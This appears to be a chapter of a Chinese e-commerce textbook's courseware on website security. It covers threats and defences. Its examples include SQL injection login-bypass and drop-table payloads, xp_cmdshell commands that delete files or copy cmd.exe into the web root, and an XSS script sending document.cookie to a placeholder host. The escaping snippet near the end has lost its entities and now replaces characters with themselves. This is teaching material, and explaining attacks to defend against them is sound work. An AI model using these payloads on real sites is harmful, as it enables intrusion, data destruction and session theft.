教学课件《电子商务》-第9章

9.1电子商务网站的安全需求电子商务网站运行的基础设施是互联网，而互联网的最大特性是信息资源共享。但是，电子商务网站存储和传输的信息是要对交易双方产生经济效益，许多信息并不能为所有访问者共享，所以电子商务网站有以下安全需求。1．交易信息的保密性2．交易信息的完整性3．交易信息的有效性4．交易者身份的真实性5．交易信息的不可抵赖性6．系统的可靠性返回9.2电子商务网站的安全隐患9.2.1一般的安全隐患1．计算机的安全隐患2．互联网的安全隐患3．电子商务交易的安全隐患（1）交易主体的真实性（2）交易信息的截获和窃取（3）交易信息的篡改（4）交易抵赖4．法律滞后造成的风险下一页返回9.2电子商务网站的安全隐患9.2.2计算机病毒1．计算机病毒的传播途径1）通过磁盘或者U盘在复制文件时传播。2）通过电子邮件在发送附件时传播。3）通过互联网上的其他途径传播。上一页下一页返回9.2电子商务网站的安全隐患2．计算机病毒的特征（1）传染性（2）隐蔽性（3）潜伏性（4）破坏性（5）不可预见性上一页下一页返回9.2电子商务网站的安全隐患3．计算机病毒的危害1）在单机情况下，使得计算机系统不能正常工作，浪费系统资源，破坏存储数据，以致整个计算机系统瘫痪。2）计算机网络系统能够使数台计算机实现资源共享，也给计算机病毒带来更为有利的生存和传播环境，病毒可以按指数增长模式传播。3）计算机病毒对于数据库的破坏，日积月累的大量数据丢失或者损坏，会造成整个管理系统混乱，甚至引起社会混乱，将会造成无法挽回的损失。上一页下一页返回9.2电子商务网站的安全隐患9.2.3SQL注入攻击1．简单的SQL注入攻击SQL注入攻击利用在编写代码时没有对重要的和特别的字符进行过滤的漏洞，通过用户输入的内容，构造特别的SQL表达式或语句达到特定的目的。例如，在完成用户登录的页面，对于输入的用户名和密码的判断构造SQL语句，形式如下（以ASP为例）：Uname=Request.Form("Username")Pass=Request.Form("Password")Sql="select*from用户信息表where用户名='"&Uname&"'and密码='"&Pass&"'"其中：Username和Password为用户在登录时输入的用户名和密码。上一页下一页返回9.2电子商务网站的安全隐患这段程序就是根据用户输入的用户名和密码，查询用户信息表中是否有满足条件的记录。例如用户输入的用户名和密码分别为admin和password，则构成查询字符串：Sql="select*from用户信息表where用户名='admin'and密码='password'"然后用这条查询语句对数据表进行查询，即进行所谓的登录验证。如果查询找到了满足条件的记录，说明用户信息表中存在该用户，即登录用户为合法用户，用户登录成功。如果查询没找到满足条件的记录，说明输入的用户名和密码不正确，用户登录失败。上一页下一页返回9.2电子商务网站的安全隐患这条语句编程思路无可挑剔、语法结构完全正确，但是在安全方面存在问题。非法访问者完全可以通过用户的输入，构造特殊的查询语句，通过验证，进入网站系统。例如登录界面的用户名栏输入admin，在密码栏输入'or'1'='1'，则上述查询语句成为：Sql="select*from用户信息表where用户名='admin'and密码=''or'1'='1'"根据运算顺序，先执行前面的“and”运算，再将结果与后面的''1'='1'进行“or”运算。因为'1'='1'永远为真，所以最终的结果一定为真。因此该查询语句的执行结果将返回记录集，即系统认为用户信息表中存在与用户输入匹配的用户，这样不知道用户密码也可以通过验证，成功登录。上一页下一页返回9.2电子商务网站的安全隐患2．常见的SQL注入方法除了上述简单的SQL注入攻击之外，还有许多SQL注入方法。例如，如果有人猜到保存用户名和密码的表名是“用户信息表”，可以在登录界面用户名栏输入：

:droptable用户信息表--上述查询语句成为：Sql="select*from用户信息表where用户名='';droptable用户信息表--and密码=''"上一页下一页返回9.2电子商务网站的安全隐患由于“；”号表示一条语句结束，另一条语句开始。上述语句形成两条语句：select*from用户信息表where用户名=''droptable用户信息表--and密码=''第一条语句没有作用，因为表中没有用户名为空。第二条语句将删除数据库中的用户信息表，从此以后所有用户都无法成功登录。另外，用户名中输入“--”号是必需的，以表示其后的内容为注释，不会产生语法错误。上一页下一页返回9.2电子商务网站的安全隐患例如，如果有人猜到后台管理员的登录用户名为“admin”，可以在登录界面的用户名栏输入：admin--上述查询语句成为：Sql="select*from用户信息表where用户名='admin--and密码=''"由于“--”号之后的内容为注释，该语句只检查前面的用户名而不检查后面的密码。上一页下一页返回9.2电子商务网站的安全隐患例如，如果有人想要获得网站数据库中的有关的表名和字段名，可以在登录界面用户名栏输入：'having1=1–上述查询语句成为：Sql="select*from用户信息表where用户名='having1=1-and密码=''"上述语句执行后，浏览器将显示错误信息'groupby用户信息表.idhaving1=1–其中：用户信息表.id中的id就是存放用户名的字段名。还可以通过SQL注入执行多种命令，这里不再叙述。上一页下一页返回9.2电子商务网站的安全隐患3．针对Access数据库的攻击Access数据库是作为文件保存在磁盘上。攻击者可能通过窃取或猜测知道网站服务器Access数据库的路径和名称，就可以下载这个数据库文件，这是非常危险的。比如名称为user.mdb的数据库存放在虚拟目录下的database目录下，攻击者在浏览器地址栏输入：http：//网站URL/database/user.mdb即可下载该数据库。上一页下一页返回9.2电子商务网站的安全隐患4．针对SQLServer数据库的攻击在SQLServer数据库系统中，有一个名为xp_cmdshell的扩展存储过程，它可以执行任何命令行命令，这是一个非常危险的存储过程。查询当前目录下的文件，执行Execmasterxp_cmdshell'dir'执行dir命令的结果是显示目录下的所有文件名。删除当前目录下的文件，执行Execmasterxp_cmdshell'del文件名'执行del命令的结果是删除指定的文件。创建UNICODE漏洞，执行Execmasterxp_cmdshell'copyc:\winnt\system32\cmd.exec:\inetpub\script\cmd.exe'将操作系统的cmd命令复制到网站的根目录下，制造了一个UNICODE漏洞。上一页下一页返回9.2电子商务网站的安全隐患9.2.4跨站脚本攻击1．跨站脚本攻击的原理跨站脚本攻击是HTML脚本注入的一种。当网站的服务器从用户提交的表单接收数据、不进行验证和加密、就将其发往浏览器时，就可能产生跨站脚本攻击。跨站脚本攻击能够发生的原因是由于动态网页的应用程序对用户提交请求的数据不做严格的检查过滤，允许用户在提交的数据中包含HTML标记（最主要的是“>”“<”），保存到网站服务器。在其他用户访问该网站时输出到该用户的浏览器。这些恶意提交的数据就冒充代码被受害者的浏览器解释执行。上一页下一页返回9.2电子商务网站的安全隐患例如，网站为合法用户输入数据提供一个具有表单的界面，等待用户输入数据。如果攻击者在表单中输入一些恶意的JavaScript脚本，而网站服务器应用程序不对用户输入的内容进行检查过滤，将其保存到数据库中。当其他合法用户访问网站的某个网页时，这个网页如果读取到数据库中保存的恶意代码，将其加载到网页中，恶意代码就会在受害者的浏览器中执行，用户的信息就会被窃取。上一页下一页返回9.2电子商务网站的安全隐患例如，在表单中输入：<imgsrc="JavaScript:alert('您可能有危险')”/>如果服务器应用程序不对该内容进行检查，直接存入服务器数据库，当其他用户访问存入上述内容的网页时，就会加载上述内容，发送到客户机浏览器，浏览器对脚本代码解析并执行，客户端就会出现一个“您可能有危险”的警告提示框。这只是一个示范，不会对用户或网站安全造成影响。如果攻击者通过下列代码：<scripe>document.location='http://网名/cookie.asp?cookie='+document.cookie</script>获取用户的Cookie信息（Cookie一般保存用户登录信息），然后就可以假冒该用户取得相应服务或进行有关操作，后果将可想而知。上一页下一页返回9.2电子商务网站的安全隐患2．跨站脚本攻击的分类跨站脚本攻击分为三种类型：反射型、存储型和基于DOM型。反射型是最容易被利用的一种，例如，页面直接返回攻击者输入数据给其他用户。存储型将恶意代码存储到服务器的数据库或文件中，随后将信息发送到访问数据库或文件的用户，这常常出现在博客、论坛等互联网的应用中。基于DOM型是一种在内存中对HTML节点进行操作的技术，主要是对JavaScript脚本及其变量进行操作。如果JavaScript脚本访问带有参数的URL，并且需要将该信息写入页面，那么就可能遭到攻击。上一页下一页返回9.2电子商务网站的安全隐患3．跨站脚本攻击的危害1）钓鱼欺诈：利用网站的反射型跨站脚本漏洞，将网页重定向到钓鱼网站，或者注入JavaScript脚本监视网站的表单输入，甚至发起基于DHTML的更高级的钓鱼攻击。2）网站挂马：利用<iframe>嵌入隐藏的恶意网站，或者将被攻击者定向到恶意网站，或者弹出恶意网站窗口等，都可以进行挂马攻击。3）身份盗用：Cookie是用户对于某个网站进行身份验证的标志，跨站脚本攻击可以盗取用户的Cookie，从而获取用户对该网站的操作权限。如果网站管理员的Cookie被盗取，将可能对网站造成毁灭性破坏。上一页下一页返回9.2电子商务网站的安全隐患4）垃圾信息发送：利用跨站脚本攻击漏洞，盗取被攻击者身份，发送大量的垃圾信息给该用户的有关群。5）用户上网行为劫取：有些高级的跨站脚本攻击甚至可以劫取用户的上网行为，监视用户的浏览历史、发送和接收的数据等。6）跨站脚本攻击蠕虫：跨站脚本攻击蠕虫用于打广告、刷流量、破坏网络数据等攻击。上一页下一页返回9.2电子商务网站的安全隐患9.2.5拒绝服务攻击拒绝服务攻击的主要目标是使被攻击的网站或服务器不能提供正常服务。1．简单的拒绝服务攻击攻击者向服务器发送大量带有虚假地址的请求，服务器发送回复信息后等待回传消息。由于地址是伪造的，服务器一直等不到回传消息，分配给该次请求的资源就一直不能被释放。当服务器等待一定的时间之后，连接会因超时而被切断。攻击者连续不断地发送新的请求，在这种反复发送伪造地址请求的情况下，服务器资源最终会被耗尽。上一页下一页返回9.2电子商务网站的安全隐患2．分布式拒绝服务攻击分布式拒绝服务攻击是一种攻击者经常采用，但服务器管理者难以防范的攻击手段，是一种特殊形式的拒绝服务攻击，是一种分布、协作的大规模攻击方式，主要瞄准大型网站。简单的拒绝服务攻击只需要一台计算机就可实现。分布式拒绝服务攻击是利用一批受到控制的计算机向一台服务器发动攻击。这样来势凶猛的攻击难以防备，具有很大的破坏性。上一页下一页返回9.2电子商务网站的安全隐患（1）攻击的三个层次1）攻击者：是攻击的主控台，可以是网络上的任何一台主机，甚至可以是一台接入网络的笔记本式计算机。攻击者操纵整个攻击过程，向主控主机发送攻击命令。2）主控端：是攻击的顶级执行者，是攻击者非法侵入并进行控制的一些主机，这些主机分别控制大量的代理主机。主控端主机上安装特定的程序，可以接收攻击者发来的特殊攻击指令，并能把这些指令发送到代理主机。3）代理端：是攻击的具体执行者，同样也是攻击者非法侵入并进行控制的一批主机，在它们上面运行攻击程序，接收主控端发来的命令，直接向受害者主机发动攻击。上一页下一页返回9.2电子商务网站的安全隐患（2）攻击的步骤1）攻击者在互联网上寻找具有漏洞的主机，攻击者侵入的主机越多，它的攻击队伍就越大。2）侵入之后的主机上安装攻击程序。其中一部分主机充当攻击的主控端，另一部分充当攻击的代理端，根据安装的攻击程序的不同而确定。3）各部分主机各司其职，在攻击者的指挥下，对攻击对象发动攻击。由于攻击者在幕后操纵，所以在攻击时不会受到监控系统的跟踪。由于分布式拒绝服务攻击具有隐蔽性，这种攻击很难被防范和解决。上一页返回9.3网站安全的防范措施9.3.1常用的防范措施1．数据加密由于数据在存储和传输过程中有可能被窃取而导致破坏，数据加密的主要目的是防止信息的非授权泄密，数据加密可用在存储和传输中。（1）数据加密术语1）明文和密文：为了将数据安全地通过网络发送到接收方，发送时对数据进行某种变换，使得攻击者即使获得变换后的数据，也看不懂其中的内容。要发送的数据称为明文。经过变换后的数据称为密文。下一页返回9.3网站安全的防范措施2）加密和解密：将明文变换成密文的过程称为加密。将密文变回到明文的过程称为解密。3）算法和密钥：加密和解密过程需要两个元素，就是算法和密钥。算法是加密或解密时所采用的一组规则。密钥是加密和解密过程中使用的一串数字。4）密钥长度：指密钥这一串数字的位数。密文破译就是攻击者经过长时间测试，破获密钥后解开密文成为明文。密钥长度决定破译的难易程度。上一页下一页返回9.3网站安全的防范措施（2）数据加密技术按照加密密钥和解密密钥是否相同，加密技术被分成两类：对称密钥加密技术和非对称密钥加密技术。1）对称密钥加密技术：数据的发送方和接收方采用相同的密钥进行加密和解密。对称密钥加密技术的优点是加密强度高，加密、解密速度快，适用于对大量数据进行加密，能够保证数据的保密性。缺点是密钥使用一段时间需要更换，并且在密钥传递过程中不能失密。对称性加密技术的密钥管理是数据加密安全的重要因素。上一页下一页返回9.3网站安全的防范措施2）非对称密钥加密技术：数据的发送方和接收方采用不同的密钥进行加密和解密。在这种加密体制中，每个网络用户都有一对唯一对应的密钥，即公开密钥和私有密钥。公钥可以公布在网络上，也可以公开传送给需要的人。私钥只有本人知道，是保密的。上一页下一页返回9.3网站安全的防范措施3）数字信封：由于对称加密和非对称加密都有优缺点，实际加密过程通常将两者结合使用，这就是所谓的数字信封。数字信封技术结合对称加密和非对称加密两种加密技术的优点，使用两个层次的加密获得非对称加密的灵活性和对称加密的高效性。数据发送方使用自己的密钥对数据进行加密，生成密文。然后用接收方的公钥加密自己的密钥，生成数字信封。最后将密文和数字信封一起发送给接收方。接收方用私钥对数字信封解密得到发送方加密数据的密钥，然后用这个密钥解密密文，得到明文。上一页下一页返回9.3网站安全的防范措施（3）数据加密方法1）保链路加密：保链路加密是对网络链路两端的设备之间的通信提供保护。2）端到端加密：端到端加密是对发送端用户到接收端用户的应用系统通信提供保护。3）节点加密：节点加密是对源节点计算机到目标节点计算机之间的信息传输提供保护。上一页下一页返回9.3网站安全的防范措施2．数字证书（1）数字证书原理数字证书采用公钥体制，即利用一对相互匹配的密钥进行加密和解密。每个用户自己设定一把特定的仅为本人所有的私钥，用这个私钥进行加密和签名。同时设定一把公钥并公开发布，为一组与自己有关的用户所共享，用于给自己发送信息时加密明文。当用户发送需要保密的数据时，使用公钥对数据进行加密，接收方使用对应的私钥进行解密。通过一定的数字手段保证加密过程不可逆转，即只有私钥才能解密。上一页下一页返回9.3网站安全的防范措施（2）数字证书类型1）从使用对象划分：个人数字证书、企业服务器数字证书、软件开发者数字证书。2）从技术角度划分：安全套接层证书、安全电子交易证书。3）从证书用途划分：签名证书、加密证书。上一页下一页返回9.3网站安全的防范措施3．防火墙技术防火墙技术用于保护网络安全，主要作用是在网络入口处检测网络通信，根据一定的安全策略，在对内网实现安全保护的前提下，与外网实现通信，极大地提高了网络通信安全。（1）防火墙概念防火墙是指一个由硬件设备和软件程序组合而成的、在网络上构筑一道安全屏障、用于加强网络安全的系统。上一页下一页返回9.3网站安全的防范措施（2）防火墙安全控制策略1）凡是未被列入允许访问的服务都被禁止。这就是说，需要确定可以被提供的服务，开放这些服务，并将未被列入的服务排除在外。2）凡是未被列入禁止访问的服务都被允许。这就是说，需要确定必须被禁止的服务、拒绝它们进入，而未被列入的服务认为是安全的，允许访问。上一页下一页返回9.3网站安全的防范措施（3）防火墙的功能1）过滤不安全服务2）过滤非法用户

3）设置安全和审计检查4）数据源控制5）应用与数据控制6）对数据加密的支持上一页下一页返回9.3网站安全的防范措施4．病毒防治技术在网络环境下，病毒有很强的威胁性和破坏力。病毒的防范是网络安全建设的重要一环。主要从防毒、查毒和杀毒三个方面保护电子商务网站服务器和客户机免遭病毒的感染和破坏。（1）病毒定义计算机病毒是指在计算机程序中插入的破坏计算机功能或者破坏计算机存储的数据、影响计算机正常使用并且能够自我复制的一组计算机指令或程序代码。上一页下一页返回9.3网站安全的防范措施（2）病毒种类互联网上存在许许多多的计算机病毒，并且逐年成倍地增加，大致可以分为以下几类。1）系统病毒

2）蠕虫病毒3）木马病毒4）黑客病毒5）脚本病毒6）宏病毒

7）种植程序病毒8）破坏性程序病毒9）玩笑病毒10）捆绑机病毒上一页下一页返回9.3网站安全的防范措施（3）病毒传播途径1）通过不能移动的计算机硬件设备进行传播。这种病毒虽然较少，但破坏力极强。2）通过移动存储设备进行传播，包括软盘、U盘、移动硬盘等。3）通过网络进行传播，特别是互联网，可以进行世界范围的广泛传播。上一页下一页返回9.3网站安全的防范措施（4）病毒防治1）基于客户机的防治：一是软件防治，安装查毒软件防治病毒入侵客户机，定期或不定期地用反病毒软件检测客户机的病毒感染情况，使用杀毒软件清除客户机病毒。二是硬件防治，在网络接口卡上安装防病毒芯片，将客户机存取控制与病毒防护合二为一，实时有效地保护客户机通向网络的桥梁。2）基于服务器的防治：采用防病毒可装载模块，以提供实时扫描病毒的能力；也可以在服务器上插防毒卡，保证服务器不受病毒的攻击，切断病毒传播的途径。上一页下一页返回9.3网站安全的防范措施5．其他防范措施除了以上技术层面的防范措施之外，要保证网站的安全，还需要在以下方面不断完善。1）网站建设单位要建立健全网站安全方面的各项规章制度，并且要落实到实际工作当中，而不只是纸上谈兵，流于形式。2）网站负责人要提高对网站安全的管理重要性的认识，认真负责贯彻单位建立的网站安全管理制度，加强为了网站安全而必需的硬件和软件资金投入。3）网站管理人员要把网站安全作为头等重要的工作任务，具体贯彻单位建立的网站安全管理制度的各项实际措施。上一页下一页返回9.3网站安全的防范措施9.3.2SQL注入攻击防范措施SQL注入攻击是由于网站服务器应用程序对用户输入的数据未能进行有效地检查和过滤造成的。因此，假定所有用户输入是可疑的，必须对其进行验证。1．输入验证2．执行最小权限3．避免向用户显示详细的错误信息4．使用强类型的变量和数据库中字段定义5．对于Access数据库6．对于SQLServer数据库上一页下一页返回9.3网站安全的防范措施9.3.3跨站脚本攻击防范措施1．输入验证在接收用户输入之后或者存储数据之前，验证数据的长度、类型和规则，禁止用户输入HTML标记和JavaScript脚本代码。2．强输出编码在将用户提交的数据显示给用户之前，确保用户提供的数据被适当编码。上一页下一页返回9.3网站安全的防范措施3．使用“黑名单”使用“黑名单”方法探测用户输入的数据中是否含有跨站脚本攻击或者有害编码，例如在用户输入中查找“>”“<”，并过滤这样的黑名单字符串，过滤代码如下：Replace(str,”<”,”<”)Replace(str,”>”,”>”)这样，攻击者就不能构造自己所需要的HTML标记。但是，攻击者还是可以利用现有的标记的属性，例如将上传图片的SRC属性中的URL替换成如下的JavaScript代码：<imgsrc=”JavaScript:alert(‘您可能会遇到麻烦!‘)“/>因此还要过滤JavaScript脚本代码。上一页下一页返回9.3网站安全的防范措施总之，需要替换的危险字符有“&”“<”“>”““”“‘”“/”“?”“；”“：”